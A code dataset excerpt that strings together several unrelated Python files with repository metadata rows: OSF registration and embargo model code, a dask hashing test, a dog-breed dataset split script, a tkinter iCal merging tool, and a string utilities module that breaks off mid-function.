raise ValidationError('Registrations can only be embargoed for up to four years.')
raise ValidationError('Embargo end date must be at least three days in the future.')
embargo = self._initiate_embargo(user, end_date,
for_existing_registration=for_existing_registration,
notify_initiator_on_complete=notify_initiator_on_complete)
self.registered_from.add_log(
action=NodeLog.EMBARGO_INITIATED,
params={
'node': self.registered_from._id,
'registration': self._id,
'embargo_id': embargo._id,
},
auth=Auth(user),
save=True,
)
if self.is_public:
self.set_privacy('private', Auth(user))
def request_embargo_termination(self, auth):
if not self.is_embargoed:
raise NodeStateError('This node is not under active embargo')
if not self.root == self:
raise NodeStateError('Only the root of an embargoed registration can request termination')
approval = EmbargoTerminationApproval(
initiated_by=auth.user,
embargoed_registration=self,
)
admins = [admin for admin in self.root.get_admin_contributors_recursive(unique_users=True)]
for (admin, node) in admins:
approval.add_authorizer(admin, node=node)
approval.save()
approval.ask(admins)
self.embargo_termination_approval = approval
self.save()
return approval
def terminate_embargo(self, auth):
if not self.is_embargoed:
raise NodeStateError('This node is not under active embargo')
self.registered_from.add_log(
action=NodeLog.EMBARGO_TERMINATED,
params={
'project': self._id,
'node': self.registered_from._id,
'registration': self._id,
},
auth=None,
save=True
)
self.embargo.mark_as_completed()
for node in self.node_and_primary_descendants():
node.set_privacy(
self.PUBLIC,
auth=None,
log=False,
save=True
)
return True
def _initiate_retraction(self, user, justification=None):
self.retraction = Retraction.objects.create(
initiated_by=user,
justification=justification or None, # make empty strings None
state=Retraction.UNAPPROVED
)
self.save()
admins = self.get_admin_contributors_recursive(unique_users=True)
for (admin, node) in admins:
self.retraction.add_authorizer(admin, node)
self.retraction.save() # Save retraction approval state
return self.retraction
def retract_registration(self, user, justification=None, save=True):
if not self.is_public and not (self.embargo_end_date or self.is_pending_embargo):
raise NodeStateError('Only public or embargoed registrations may be withdrawn.')
if self.root_id != self.id:
raise NodeStateError('Withdrawal of non-parent registrations is not permitted.')
retraction = self._initiate_retraction(user, justification)
self.registered_from.add_log(
action=NodeLog.RETRACTION_INITIATED,
params={
'node': self.registered_from._id,
'registration': self._id,
'retraction_id': retraction._id,
},
auth=Auth(user),
)
self.retraction = retraction
if save:
self.save()
return retraction
def copy_unclaimed_records(self):
registered_from_id = self.registered_from._id
for contributor in self.contributors.filter(is_registered=False):
record = contributor.unclaimed_records.get(registered_from_id)
if record:
contributor.unclaimed_records[self._id] = record
contributor.save()
def delete_registration_tree(self, save=False):
logger.debug('Marking registration {} as deleted'.format(self._id))
self.is_deleted = True
for draft_registration in DraftRegistration.objects.filter(registered_node=self):
# Allow draft registration to be submitted
if draft_registration.approval:
draft_registration.approval = None
draft_registration.save()
if not getattr(self.embargo, 'for_existing_registration', False):
self.registered_from = None
if save:
self.save()
self.update_search()
for child in self.nodes_primary:
child.delete_registration_tree(save=save)
def update_files_count(self):
# Updates registration files_count at archival success or
# at the end of forced (manual) archive for restarted (stuck or failed) registrations.
field = AbstractNode._meta.get_field('modified')
field.auto_now = False
self.files_count = self.files.filter(deleted_on__isnull=True).count()
self.save()
field.auto_now = True
def add_tag(self, tag, auth=None, save=True, log=True, system=False):
if self.retraction is None:
super(Registration, self).add_tag(tag, auth, save, log, system)
else:
raise NodeStateError('Cannot add tags to withdrawn registrations.')
def add_tags(self, tags, auth=None, save=True, log=True, system=False):
if self.retraction is None:
super(Registration, self).add_tags(tags, auth, save, log, system)
else:
raise NodeStateError('Cannot add tags to withdrawn registrations.')
def remove_tag(self, tag, auth, save=True):
if self.retraction is None:
super(Registration, self).remove_tag(tag, auth, save)
else:
raise NodeStateError('Cannot remove tags of withdrawn registrations.')
def remove_tags(self, tags, auth, save=True):
if self.retraction is None:
super(Registration, self).remove_tags(tags, auth, save)
else:
raise NodeStateError('Cannot remove tags of withdrawn registrations.')
class Meta:
# custom permissions for use in the OSF Admin App
permissions = (
('view_registration', 'Can view registration details'),
)
class DraftRegistrationLog(ObjectIDMixin, BaseModel):
date = NonNaiveDateTimeField(default=timezone.now)
action = models.CharField(max_length=255)
draft = models.ForeignKey('DraftRegistration', related_name='logs',
null=True, blank=True, on_delete=models.CASCADE)
user = models.ForeignKey('OSFUser', null=True, on_delete=models.CASCADE)
SUBMITTED = 'submitted'
REGISTERED = 'registered'
APPROVED = 'approved'
REJECTED = 'rejected'
def __repr__(self):
return ('<DraftRegistrationLog({self.action!r}, date={self.date!r}), '
'user={self.user!r} '
'with id {self._id!r}>').format(self=self)
class DraftRegistration(ObjectIDMixin, BaseModel):
URL_TEMPLATE = settings.DOMAIN + 'project/{node_id}/drafts/{draft_id}'
datetime_initiated = NonNaiveDateTimeField(auto_now_add=True)
datetime_updated = NonNaiveDateTimeField(auto_now=True)
deleted = NonNaiveDateTimeField(null=True, blank=True)
# Original Node a draft registration is associated with
branched_from = models.ForeignKey('Node', related_name='registered_draft',
null=True, on_delete=models.CASCADE)
initiator = models.ForeignKey('OSFUser', null=True, on_delete=models.CASCADE)
provider = models.ForeignKey('RegistrationProvider', related_name='draft_registrations', null=True)
# Dictionary field mapping question id to a question's comments and answer
registration_metadata = DateTimeAwareJSONField(default=dict, blank=True)
registration_schema = models.ForeignKey('RegistrationSchema', null=True, on_delete=models.CASCADE)
registered_node = models.ForeignKey('Registration', null=True, blank=True,
related_name='draft_registration', on_delete=models.CASCADE)
approval = models.ForeignKey('DraftRegistrationApproval', null=True, blank=True, on_delete=models.CASCADE)
_metaschema_flags = DateTimeAwareJSONField(default=dict, blank=True)
notes = models.TextField(blank=True)
def __repr__(self):
return ('<DraftRegistration(branched_from={self.branched_from!r}) '
'with id {self._id!r}>').format(self=self)
@property
def flags(self):
if not self._metaschema_flags:
self._metaschema_flags = {}
meta_schema = self.registration_schema
if meta_schema:
schema = meta_schema.schema
flags = schema.get('flags', {})
dirty = False
for flag, value in flags.items():
if flag not in self._metaschema_flags:
self._metaschema_flags[flag] = value
dirty = True
if dirty:
self.save()
return self._metaschema_flags
@flags.setter
def flags(self, flags):
self._metaschema_flags.update(flags)
@property
def url(self):
return self.URL_TEMPLATE.format(
node_id=self.branched_from._id,
draft_id=self._id
)
@property
def absolute_url(self):
return urlparse.urljoin(settings.DOMAIN, self.url)
@property
def absolute_api_v2_url(self):
node = self.branched_from
path = '/nodes/{}/draft_registrations/{}/'.format(node._id, self._id)
return api_v2_url(path)
def get_absolute_url(self):
return self.absolute_api_v2_url
@property
def requires_approval(self):
return self.registration_schema.requires_approval
@property
def is_pending_review(self):
return self.approval.is_pending_approval if (self.requires_approval and self.approval) else False
@property
def is_approved(self):
if self.requires_approval:
if not self.approval:
return bool(self.registered_node)
else:
return self.approval.is_approved
else:
return False
@property
def is_rejected(self):
if self.requires_approval:
if not self.approval:
return False
else:
return self.approval.is_rejected
else:
return False
@property
def status_logs(self):
return self.logs.all().order_by('date')
@classmethod
def create_from_node(cls, node, user, schema, data=None, provider=None):
if not provider:
provider = RegistrationProvider.load('osf')
draft = cls(
initiator=user,
branched_from=node,
registration_schema=schema,
registration_metadata=data or {},
provider=provider,
)
draft.save()
return draft
def update_metadata(self, metadata):
changes = []
if not self.is_approved:
for question_id, value in metadata.items():
old_value = self.registration_metadata.get(question_id)
if old_value:
old_comments = {
comment['created']: comment
for comment in old_value.get('comments', [])
}
new_comments = {
comment['created']: comment
for comment in value.get('comments', [])
}
old_comments.update(new_comments)
metadata[question_id]['comments'] = sorted(
old_comments.values(),
key=lambda c: c['created']
)
if old_value.get('value') != value.get('value'):
changes.append(question_id)
else:
changes.append(question_id)
self.registration_metadata.update(metadata)
return changes
def submit_for_review(self, initiated_by, meta, save=False):
approval = DraftRegistrationApproval(
meta=meta
)
approval.save()
self.approval = approval
self.add_status_log(initiated_by, DraftRegistrationLog.SUBMITTED)
if save:
self.save()
def register(self, auth, save=False, child_ids=None):
node = self.branched_from
register = node.register_node(
schema=self.registration_schema,
auth=auth,
data=self.registration_metadata,
child_ids=child_ids,
provider=self.provider
)
self.registered_node = register
self.add_status_log(auth.user, DraftRegistrationLog.REGISTERED)
if save:
self.save()
return register
def approve(self, user):
self.approval.approve(user)
self.refresh_from_db()
self.add_status_log(user, DraftRegistrationLog.APPROVED)
self.approval.save()
def reject(self, user):
self.approval.reject(user)
self.add_status_log(user, DraftRegistrationLog.REJECTED)
self.approval.save()
def add_status_log(self, user, action):
log = DraftRegistrationLog(action=action, user=user, draft=self)
log.save()
def validate_metadata(self, *args, **kwargs):
return self.registration_schema.validate_metadata(*args, **kwargs)
| true | true |
f725ebb2af351289e10da0b9ff19a8676765fe30 | 2,020 | py | Python | dask/dataframe/tests/test_hashing.py | abhinavralhan/dask | e840ba38eadfa93c3b9959347f0a43c1279a94ab | [
"BSD-3-Clause"
] | 2 | 2018-12-29T13:47:40.000Z | 2018-12-29T13:47:49.000Z | dask/dataframe/tests/test_hashing.py | abhinavralhan/dask | e840ba38eadfa93c3b9959347f0a43c1279a94ab | [
"BSD-3-Clause"
] | 2 | 2019-03-19T22:19:04.000Z | 2019-03-26T19:04:00.000Z | dask/dataframe/tests/test_hashing.py | abhinavralhan/dask | e840ba38eadfa93c3b9959347f0a43c1279a94ab | [
"BSD-3-Clause"
] | 1 | 2021-03-28T04:50:43.000Z | 2021-03-28T04:50:43.000Z | import numpy as np
import pandas as pd
import pandas.util.testing as tm
import pytest
from dask.dataframe.hashing import hash_pandas_object
from dask.dataframe.utils import assert_eq
@pytest.mark.parametrize('obj', [
pd.Series([1, 2, 3]),
pd.Series([1.0, 1.5, 3.2]),
pd.Series([1.0, 1.5, 3.2], index=[1.5, 1.1, 3.3]),
pd.Series(['a', 'b', 'c']),
pd.Series([True, False, True]),
pd.Index([1, 2, 3]),
pd.Index([True, False, True]),
pd.DataFrame({'x': ['a', 'b', 'c'], 'y': [1, 2, 3]}),
pd.util.testing.makeMissingDataframe(),
pd.util.testing.makeMixedDataFrame(),
pd.util.testing.makeTimeDataFrame(),
pd.util.testing.makeTimeSeries(),
pd.util.testing.makeTimedeltaIndex()])
def test_hash_pandas_object(obj):
a = hash_pandas_object(obj)
b = hash_pandas_object(obj)
if isinstance(a, np.ndarray):
np.testing.assert_equal(a, b)
else:
assert_eq(a, b)
def test_categorical_consistency():
# Check that categoricals hash consistent with their values, not codes
# This should work for categoricals of any dtype
for s1 in [pd.Series(['a', 'b', 'c', 'd']),
pd.Series([1000, 2000, 3000, 4000]),
pd.Series(pd.date_range(0, periods=4))]:
s2 = s1.astype('category').cat.set_categories(s1)
s3 = s2.cat.set_categories(list(reversed(s1)))
for categorize in [True, False]:
# These should all hash identically
h1 = hash_pandas_object(s1, categorize=categorize)
h2 = hash_pandas_object(s2, categorize=categorize)
h3 = hash_pandas_object(s3, categorize=categorize)
tm.assert_series_equal(h1, h2)
tm.assert_series_equal(h1, h3)
def test_object_missing_values():
# Check that the presence of missing values doesn't change how object dtype
# is hashed.
s = pd.Series(['a', 'b', 'c', None])
h1 = hash_pandas_object(s).iloc[:3]
h2 = hash_pandas_object(s.iloc[:3])
tm.assert_series_equal(h1, h2)
| 34.827586 | 79 | 0.637129 | import numpy as np
import pandas as pd
import pandas.util.testing as tm
import pytest
from dask.dataframe.hashing import hash_pandas_object
from dask.dataframe.utils import assert_eq
@pytest.mark.parametrize('obj', [
pd.Series([1, 2, 3]),
pd.Series([1.0, 1.5, 3.2]),
pd.Series([1.0, 1.5, 3.2], index=[1.5, 1.1, 3.3]),
pd.Series(['a', 'b', 'c']),
pd.Series([True, False, True]),
pd.Index([1, 2, 3]),
pd.Index([True, False, True]),
pd.DataFrame({'x': ['a', 'b', 'c'], 'y': [1, 2, 3]}),
pd.util.testing.makeMissingDataframe(),
pd.util.testing.makeMixedDataFrame(),
pd.util.testing.makeTimeDataFrame(),
pd.util.testing.makeTimeSeries(),
pd.util.testing.makeTimedeltaIndex()])
def test_hash_pandas_object(obj):
a = hash_pandas_object(obj)
b = hash_pandas_object(obj)
if isinstance(a, np.ndarray):
np.testing.assert_equal(a, b)
else:
assert_eq(a, b)
def test_categorical_consistency():
for s1 in [pd.Series(['a', 'b', 'c', 'd']),
pd.Series([1000, 2000, 3000, 4000]),
pd.Series(pd.date_range(0, periods=4))]:
s2 = s1.astype('category').cat.set_categories(s1)
s3 = s2.cat.set_categories(list(reversed(s1)))
for categorize in [True, False]:
h1 = hash_pandas_object(s1, categorize=categorize)
h2 = hash_pandas_object(s2, categorize=categorize)
h3 = hash_pandas_object(s3, categorize=categorize)
tm.assert_series_equal(h1, h2)
tm.assert_series_equal(h1, h3)
def test_object_missing_values():
# is hashed.
s = pd.Series(['a', 'b', 'c', None])
h1 = hash_pandas_object(s).iloc[:3]
h2 = hash_pandas_object(s.iloc[:3])
tm.assert_series_equal(h1, h2)
| true | true |
f725ebe4a0002cf0ad0cfd933670021232062f21 | 2,166 | py | Python | dataset_processing.py | alechfho/dog_breed | 2e2f7083c859fdb250f5ba920246b9d2f8168b4d | [
"Apache-2.0"
] | null | null | null | dataset_processing.py | alechfho/dog_breed | 2e2f7083c859fdb250f5ba920246b9d2f8168b4d | [
"Apache-2.0"
] | null | null | null | dataset_processing.py | alechfho/dog_breed | 2e2f7083c859fdb250f5ba920246b9d2f8168b4d | [
"Apache-2.0"
] | null | null | null | import numpy as np
import pandas as pd
def partition_images(df_labels, identifier_label=None, label_postfix='postfix', target_dir='./', filter_identity=[],
dev_portion=0.20, encoding_strategy='vgg19_4096'):
if np.size(filter_identity) == 0:
filter_identity = df_labels[identifier_label].unique()
df_filter_labels = df_labels[df_labels.breed.isin(filter_identity)]
df_filter_identifier_label_count = df_filter_labels.groupby([identifier_label]).agg(['count'])
df_filter_identifier_label_count['dev_count'] = np.ceil(
df_filter_identifier_label_count[df_filter_identifier_label_count.columns[0]] * dev_portion).astype(int)
df_result_train = pd.DataFrame()
df_result_dev = pd.DataFrame()
for ident_label, row in df_filter_identifier_label_count.iterrows():
total = row[0]
dev_count = row[1]
train_count = total - dev_count
df_train, df_dev = filter_images_by_label(df_filter_labels, ident_label, train_count, dev_count)
df_result_train = df_result_train.append(df_train)
df_result_dev = df_result_dev.append(df_dev)
train_label = '{target_dir}/labels_train_{label_postfix}.csv'.format(target_dir=target_dir,
label_postfix=label_postfix)
dev_label = '{target_dir}/labels_dev_{label_postfix}.csv'.format(target_dir=target_dir, label_postfix=label_postfix)
print('Split into training and dev sets')
print('Training set in ' + train_label)
print(df_result_train.groupby([identifier_label]).agg(['count']))
print('Dev set in ' + dev_label)
print(df_result_dev.groupby([identifier_label]).agg(['count']))
df_result_train.to_csv(train_label, index=False)
df_result_dev.to_csv(dev_label, index=False)
return
def filter_images_by_label(df_labels, label, train_count, dev_count):
df_selected_label = df_labels[df_labels.breed.isin([label])]
df_selected_label_train = df_selected_label.head(train_count)
df_selected_label_vaidation = df_selected_label.tail(dev_count)
return df_selected_label_train, df_selected_label_vaidation
| 47.086957 | 120 | 0.72807 | import numpy as np
import pandas as pd
def partition_images(df_labels, identifier_label=None, label_postfix='postfix', target_dir='./', filter_identity=[],
dev_portion=0.20, encoding_strategy='vgg19_4096'):
if np.size(filter_identity) == 0:
filter_identity = df_labels[identifier_label].unique()
df_filter_labels = df_labels[df_labels.breed.isin(filter_identity)]
df_filter_identifier_label_count = df_filter_labels.groupby([identifier_label]).agg(['count'])
df_filter_identifier_label_count['dev_count'] = np.ceil(
df_filter_identifier_label_count[df_filter_identifier_label_count.columns[0]] * dev_portion).astype(int)
df_result_train = pd.DataFrame()
df_result_dev = pd.DataFrame()
for ident_label, row in df_filter_identifier_label_count.iterrows():
total = row[0]
dev_count = row[1]
train_count = total - dev_count
df_train, df_dev = filter_images_by_label(df_filter_labels, ident_label, train_count, dev_count)
df_result_train = df_result_train.append(df_train)
df_result_dev = df_result_dev.append(df_dev)
train_label = '{target_dir}/labels_train_{label_postfix}.csv'.format(target_dir=target_dir,
label_postfix=label_postfix)
dev_label = '{target_dir}/labels_dev_{label_postfix}.csv'.format(target_dir=target_dir, label_postfix=label_postfix)
print('Split into training and dev sets')
print('Training set in ' + train_label)
print(df_result_train.groupby([identifier_label]).agg(['count']))
print('Dev set in ' + dev_label)
print(df_result_dev.groupby([identifier_label]).agg(['count']))
df_result_train.to_csv(train_label, index=False)
df_result_dev.to_csv(dev_label, index=False)
return
def filter_images_by_label(df_labels, label, train_count, dev_count):
df_selected_label = df_labels[df_labels.breed.isin([label])]
df_selected_label_train = df_selected_label.head(train_count)
df_selected_label_vaidation = df_selected_label.tail(dev_count)
return df_selected_label_train, df_selected_label_vaidation
| true | true |
f725ec3baf077b8402ef54fa4ab3be9010a6ff8a | 6,686 | py | Python | ical_fusion.py | octogene/icalfusion | 3c00762d7d9353ed65109deef001cb7ba94051d1 | [
"MIT"
] | null | null | null | ical_fusion.py | octogene/icalfusion | 3c00762d7d9353ed65109deef001cb7ba94051d1 | [
"MIT"
] | null | null | null | ical_fusion.py | octogene/icalfusion | 3c00762d7d9353ed65109deef001cb7ba94051d1 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2017 Bogdan Cordier
#
# Distributed under terms of the MIT license.
import datetime
from icalendar import Calendar
from pytz import timezone
from dateutil.parser import parse
from tkinter import Tk, filedialog, Listbox, Button, Entry, StringVar, \
LabelFrame, BooleanVar, Frame, ttk, END, Checkbutton, messagebox
local_timezone = timezone('Europe/Paris')
ical_fields = ('SUMMARY', 'UID', 'LOCATION', 'CATEGORIES', 'DTSTART', 'DTEND')
class GUI:
def __init__(self):
self.root = Tk()
self.root.title('ICal Fusion')
self.root.iconbitmap('@icon.xbm')
self.create_filter_frame()
self.files = []
self.create_files_list_frame()
self.create_duplicates_frame()
self.btn_frame = Frame(self.root)
self.create_button_frame()
self.calendar = Calendar()
self.root.mainloop()
def create_filter_frame(self):
filter_frame = LabelFrame(self.root, text='Filter')
self.filter_type = ttk.Combobox(filter_frame, values=ical_fields)
self.filter_type.current(0)
self.filter_type.bind("<<ComboboxSelected>>", self.update_filter_cond)
self.filter_type.state(('!disabled', 'readonly'))
self.filter_type.grid(row=0)
self.filter_cond = ttk.Combobox(filter_frame,
values=('CONTAINS',
'EQUAL TO'))
self.filter_cond.current(0)
self.filter_cond.state(('!disabled', 'readonly'))
self.filter_cond.grid(row=0, column=1)
self.filter_value = StringVar()
self.filter_entry = Entry(filter_frame,
textvariable=self.filter_value,
width=25,
bg='white')
self.filter_entry.grid(row=0, column=2)
filter_frame.pack(fill='x', side='top')
def update_filter_cond(self, *args):
""" Update filter conditions on filter type selection.
"""
if self.filter_type.get() in ('DTSTART', 'DTEND'):
self.filter_cond['values'] = ('BEFORE', 'AFTER')
else:
self.filter_cond['values'] = ('CONTAINS', 'EQUAL TO')
self.filter_cond.current(0)
def create_files_list_frame(self):
files_list_frame = LabelFrame(self.root, text='Files to merge')
self.FilesList = Listbox(files_list_frame)
self.FilesList.pack(side='left', fill='both', expand=1)
files_list_frame.pack(fill='x')
def create_duplicates_frame(self):
frame = Frame(self.root)
self.duplicates_check = BooleanVar()
self.duplicates_filter = ttk.Combobox(frame, value=ical_fields)
self.duplicates_filter.current(0)
self.duplicates_filter.state(('!disabled', 'readonly'))
self.duplicates_filter.pack(side='right')
self.duplicates_cbox = Checkbutton(frame,
variable=self.duplicates_check,
text='Remove duplicates by')
self.duplicates_cbox.pack(side='right')
frame.pack(fill='x')
def create_button_frame(self):
Button(self.btn_frame, text='Add...',
command=self.add_files).grid(row=0, column=0)
Button(self.btn_frame, text='Merge',
command=self.join_files).grid(row=0, column=1)
self.btn_frame.pack(side='bottom')
def add_files(self):
files = filedialog.askopenfilenames(title="Load ICal files",
filetypes=[('ICal files', '.ics'),
('all files', '.*')])
for file in files:
self.FilesList.insert(END, file)
def filter(self, event):
"""Check if condition is met for a given event field"""
value = self.filter_value.get()
field = self.filter_type.get()
condition = self.filter_cond.get()
if field in ('DTSTART', 'DTEND'):
try:
value = parse(value)
except ValueError:
messagebox.showerror('Wrong value',
'Value is not recognized as a date')
value = self.normalize_date(value)
if condition == 'CONTAINS':
if value in event.get(field):
return True
if condition == 'EQUAL TO':
if value == event.get(field):
return True
if condition == 'BEFORE':
if value > self.normalize_date(event.get(field).dt):
return True
if condition == 'AFTER':
if value < self.normalize_date(event.get(field).dt):
return True
return False
def normalize_date(self, date):
"""Ensure that date is a datetime object and is offset aware."""
if not isinstance(date, datetime.datetime):
date = datetime.datetime(date.year, date.month, date.day)
if date.tzinfo is None or date.tzinfo.utcoffset(date) is None:
date = local_timezone.localize(date)
return date
def join_files(self):
if self.FilesList.get(0, END):
ical = filedialog.asksaveasfilename(title='Save as...')
self.checked_values = set()
for file in self.FilesList.get(0, END):
ics = open(file, 'r')
cal = Calendar.from_ical(ics.read())
ics.close()
events = (co for co in cal.walk() if co.name == 'VEVENT')
for event in events:
if self.duplicates_check.get():
field = self.duplicates_filter.get()
value = event.get(field)
if value in self.checked_values:
break
else:
self.checked_values.add(value)
if self.filter_value:
if self.filter(event):
self.calendar.add_component(event)
else:
if self.duplicates_cbox.getboolean():
pass
else:
self.calendar.add_component(event)
with open(ical, 'wb') as f:
f.write(self.calendar.to_ical())
messagebox.showinfo('Success', 'Files were successfully joined !')
else:
messagebox.showerror('No files', 'Please add files to merge...')
if __name__ == '__main__':
GUI()
| 36.939227 | 78 | 0.551152 |
import datetime
from icalendar import Calendar
from pytz import timezone
from dateutil.parser import parse
from tkinter import Tk, filedialog, Listbox, Button, Entry, StringVar, \
LabelFrame, BooleanVar, Frame, ttk, END, Checkbutton, messagebox
local_timezone = timezone('Europe/Paris')
ical_fields = ('SUMMARY', 'UID', 'LOCATION', 'CATEGORIES', 'DTSTART', 'DTEND')
class GUI:
def __init__(self):
self.root = Tk()
self.root.title('ICal Fusion')
self.root.iconbitmap('@icon.xbm')
self.create_filter_frame()
self.files = []
self.create_files_list_frame()
self.create_duplicates_frame()
self.btn_frame = Frame(self.root)
self.create_button_frame()
self.calendar = Calendar()
self.root.mainloop()
def create_filter_frame(self):
filter_frame = LabelFrame(self.root, text='Filter')
self.filter_type = ttk.Combobox(filter_frame, values=ical_fields)
self.filter_type.current(0)
self.filter_type.bind("<<ComboboxSelected>>", self.update_filter_cond)
self.filter_type.state(('!disabled', 'readonly'))
self.filter_type.grid(row=0)
self.filter_cond = ttk.Combobox(filter_frame,
values=('CONTAINS',
'EQUAL TO'))
self.filter_cond.current(0)
self.filter_cond.state(('!disabled', 'readonly'))
self.filter_cond.grid(row=0, column=1)
self.filter_value = StringVar()
self.filter_entry = Entry(filter_frame,
textvariable=self.filter_value,
width=25,
bg='white')
self.filter_entry.grid(row=0, column=2)
filter_frame.pack(fill='x', side='top')
def update_filter_cond(self, *args):
if self.filter_type.get() in ('DTSTART', 'DTEND'):
self.filter_cond['values'] = ('BEFORE', 'AFTER')
else:
self.filter_cond['values'] = ('CONTAINS', 'EQUAL TO')
self.filter_cond.current(0)
def create_files_list_frame(self):
files_list_frame = LabelFrame(self.root, text='Files to merge')
self.FilesList = Listbox(files_list_frame)
self.FilesList.pack(side='left', fill='both', expand=1)
files_list_frame.pack(fill='x')
def create_duplicates_frame(self):
frame = Frame(self.root)
self.duplicates_check = BooleanVar()
self.duplicates_filter = ttk.Combobox(frame, value=ical_fields)
self.duplicates_filter.current(0)
self.duplicates_filter.state(('!disabled', 'readonly'))
self.duplicates_filter.pack(side='right')
self.duplicates_cbox = Checkbutton(frame,
variable=self.duplicates_check,
text='Remove duplicates by')
self.duplicates_cbox.pack(side='right')
frame.pack(fill='x')
def create_button_frame(self):
Button(self.btn_frame, text='Add...',
command=self.add_files).grid(row=0, column=0)
Button(self.btn_frame, text='Merge',
command=self.join_files).grid(row=0, column=1)
self.btn_frame.pack(side='bottom')
def add_files(self):
files = filedialog.askopenfilenames(title="Load ICal files",
filetypes=[('ICal files', '.ics'),
('all files', '.*')])
for file in files:
self.FilesList.insert(END, file)
def filter(self, event):
value = self.filter_value.get()
field = self.filter_type.get()
condition = self.filter_cond.get()
if field in ('DTSTART', 'DTEND'):
try:
value = parse(value)
except ValueError:
messagebox.showerror('Wrong value',
'Value is not recognized as a date')
value = self.normalize_date(value)
if condition == 'CONTAINS':
if value in event.get(field):
return True
if condition == 'EQUAL TO':
if value == event.get(field):
return True
if condition == 'BEFORE':
if value > self.normalize_date(event.get(field).dt):
return True
if condition == 'AFTER':
if value < self.normalize_date(event.get(field).dt):
return True
return False
def normalize_date(self, date):
if not isinstance(date, datetime.datetime):
date = datetime.datetime(date.year, date.month, date.day)
if date.tzinfo is None or date.tzinfo.utcoffset(date) is None:
date = local_timezone.localize(date)
return date
def join_files(self):
if self.FilesList.get(0, END):
ical = filedialog.asksaveasfilename(title='Save as...')
self.checked_values = set()
for file in self.FilesList.get(0, END):
ics = open(file, 'r')
cal = Calendar.from_ical(ics.read())
ics.close()
events = (co for co in cal.walk() if co.name == 'VEVENT')
for event in events:
if self.duplicates_check.get():
field = self.duplicates_filter.get()
value = event.get(field)
if value in self.checked_values:
break
else:
self.checked_values.add(value)
if self.filter_value:
if self.filter(event):
self.calendar.add_component(event)
else:
if self.duplicates_cbox.getboolean():
pass
else:
self.calendar.add_component(event)
with open(ical, 'wb') as f:
f.write(self.calendar.to_ical())
messagebox.showinfo('Success', 'Files were successfully joined !')
else:
messagebox.showerror('No files', 'Please add files to merge...')
if __name__ == '__main__':
GUI()
| true | true |
f725ecc93cfb05f785f6599c6384eea2e2c02e46 | 7,910 | py | Python | utilbox/string_utils/string_utils.py | jensonjose/utilbox | f47ac1c97fdd3f7caf8ea1c6b693ea115076f0e8 | [
"MIT"
] | 1 | 2017-07-08T17:59:09.000Z | 2017-07-08T17:59:09.000Z | utilbox/string_utils/string_utils.py | jensonjose/utilbox | f47ac1c97fdd3f7caf8ea1c6b693ea115076f0e8 | [
"MIT"
] | 1 | 2017-08-12T13:51:37.000Z | 2017-08-12T13:51:37.000Z | utilbox/string_utils/string_utils.py | jensonjose/utilbox | f47ac1c97fdd3f7caf8ea1c6b693ea115076f0e8 | [
"MIT"
] | 1 | 2018-10-27T06:13:22.000Z | 2018-10-27T06:13:22.000Z | """
Utility module to manipulate strings.
"""
import re
import types
__author__ = "Jenson Jose"
__email__ = "jensonjose@live.in"
__status__ = "Alpha"
class StringUtils:
"""
Utility class containing methods for manipulation of strings.
"""
def __init__(self):
pass
@staticmethod
def is_blank(string):
"""
Checks is supplied string is blank.
:param string: The string to be verified.
:return: True if string is blank, False otherwise.
:rtype: bool
"""
if string.strip():
return False
return True
@staticmethod
def join_list_elements(string_list, join_char=""):
"""
Joins list elements into a single string, using the joining character.
:param string_list: The list of strings to be joined.
:param join_char: The character to use for joining the strings.
:return: The combined string of joined list elements, if string_list is a valid list, False otherwise.
:rtype: str
"""
if isinstance(string_list, types.ListType):
if len(string_list) > 0:
return str(join_char).join(string_list)
return False
@staticmethod
def remove_lines(text, line_count):
"""
Removes specified number of lines from beginning or end of supplied text.
:param text: Text from which lines are to be removed.
:param line_count: The number of lines to remove.
+ve value starts removal from beginning and -ve value start removal from end.
:return: The updated text with removed lines.
:rtype: str
"""
text_lines = text.split("\n")
if len(text_lines) > 0:
if line_count > 0:
for index in range(0, line_count):
text_lines.remove(text_lines[index])
elif line_count < 0:
text_lines_r = text_lines
text_lines_r.reverse()
# print "baa... " + str(text_lines) + "...aab"
# print "baaR... " + str(text_lines_r) + "...Raab"
for index in range(0, line_count):
text_lines_r.remove(text_lines_r[index])
text_lines = text_lines_r
text_lines.reverse()
else:
pass
updated_text = StringUtils.join_list_elements(text_lines, "\n")
return updated_text
@staticmethod
def remove_lines_range(text, start_line_number, end_line_number):
"""
Removes a range of lines from the supplied text.
:param text: Text from which lines are to be removed.
:param start_line_number: Starting line number where removal will begin.
:param end_line_number: Ending line number where removal will end.
:return: The updated text with removed lines.
:rtype: str
"""
text_lines = text.split("\n")
if len(text_lines) > 0:
for index in range(start_line_number, end_line_number):
text_lines.remove(text_lines[index])
updated_text = StringUtils.join_list_elements(text_lines, "\n")
return updated_text
@staticmethod
def remove_lines_list(text, line_list):
"""
Removes specified lines from the supplied text.
:param text: Text from which lines are to be removed.
:param line_list: List containing specific lines to remove from the text.
:return: The updated text with removed lines.
:rtype: str
"""
text_lines = text.split("\n")
if len(text_lines) > 0:
for line_index in line_list:
text_lines.remove(text_lines[line_index])
updated_text = StringUtils.join_list_elements(text_lines, "\n")
return updated_text
@staticmethod
def remove_leading_blanks(string):
"""
Removes leading blank spaces from supplied string.
:param string: String from which leading blanks are to be removed.
:return: String with leading blanks removed.
:rtype: str
"""
text_lines = string.split("\n")
if len(text_lines) > 0:
for line in text_lines:
if StringUtils.is_blank(line):
text_lines.remove(line)
else:
break
updated_string = StringUtils.join_list_elements(text_lines, "\n")
return updated_string
@staticmethod
def remove_trailing_blanks(string):
"""
Removes trailing blank spaces from supplied string.
:param string: String from which trailing blanks are to be removed.
:return: String with trailing blanks removed.
:rtype: str
"""
text_lines = string.split("\n")
text_lines_r = ""
if len(text_lines) > 0:
text_lines_r = text_lines
text_lines_r.reverse()
for line in text_lines_r:
if StringUtils.is_blank(line):
text_lines_r.remove(line)
else:
break
text_lines = text_lines_r
text_lines.reverse()
updated_string = StringUtils.join_list_elements(text_lines, "\n")
return updated_string
@staticmethod
def extract_line(text, line_number):
"""
Extracts specified line from the supplied text based on line number.
:param text: Text from which line is to be extracted.
:param line_number: Line number to be extracted.
:return: The extracted line.
:rtype: str
"""
text_lines = text.split("\n")
if len(text_lines) > 0:
return text_lines[line_number - 1]
return False
@staticmethod
def get_line_number(text, string):
"""
Determines line number of first occurrence of given string within given text.
:param text: Text in which 'string' is to be searched.
:param string: Data to locate within given text.
:return: The extracted line number.
:rtype: str
"""
text_lines = text.split("\n")
# look for exact match in the supplied text
line_ctr = 1
for text_line in text_lines:
